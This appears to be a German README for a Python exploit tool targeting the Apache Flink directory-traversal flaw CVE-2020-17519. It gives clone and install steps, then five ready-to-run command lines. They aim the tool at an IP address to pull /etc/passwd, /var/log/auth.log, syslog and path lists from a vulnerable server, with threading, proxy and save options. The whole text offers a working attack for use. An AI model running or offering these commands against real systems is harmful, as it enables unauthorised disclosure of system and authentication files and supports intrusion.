
Python-basierter Directory-Traversal-Exploit für CVE-2020-17519 (Apache Flink) mit Multithreading, Proxy-Unterstützung und konfigurierbarer Tiefe zum Abrufen von Logdateien von anfälligen Zielen.
Ein Python-Tool, das eine Directory-Traversal-Technik verwendet, um Log-Dateien von einer Ziel-URL anzufordern. Es zeigt den Fortschritt in Echtzeit an, unterstützt Proxy-Konfiguration und speichert optional gültige Antworten.
requests und pwntools (pwn)argparse, os, concurrent.futures, threadinggit clone https://github.com/GazettEl/CVE-2020-17519.git
pip install requests pwntools
Das Tool kann von der Kommandozeile mit verschiedenen Optionen ausgeführt werden. Nachfolgend einige Beispiele:
Beispiel 1: Einzelnen Dateipfad anfordern
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-path /var/log/syslog --threads 1 --save
Beispiel 2: Mehrere Dateipfade aus einer Liste anfordern
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-list file_paths.txt --threads 4 --proxy none
Beispiel 3: Mit deaktiviertem Proxy ausführen
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 10 --file-path /var/log/auth.log --threads 2 --proxy none
Beispiel 4: Dateiliste verwenden und gültige Antworten speichern
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 15 --file-list paths.txt --threads 4 --save
Beispiel 5: Einzelne Datei mit erhöhter Tiefe anfordern
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 20 --file-path /etc/passwd --threads 1
Weitere Details finden Sie im Quellcode und in den Inline-Kommentaren.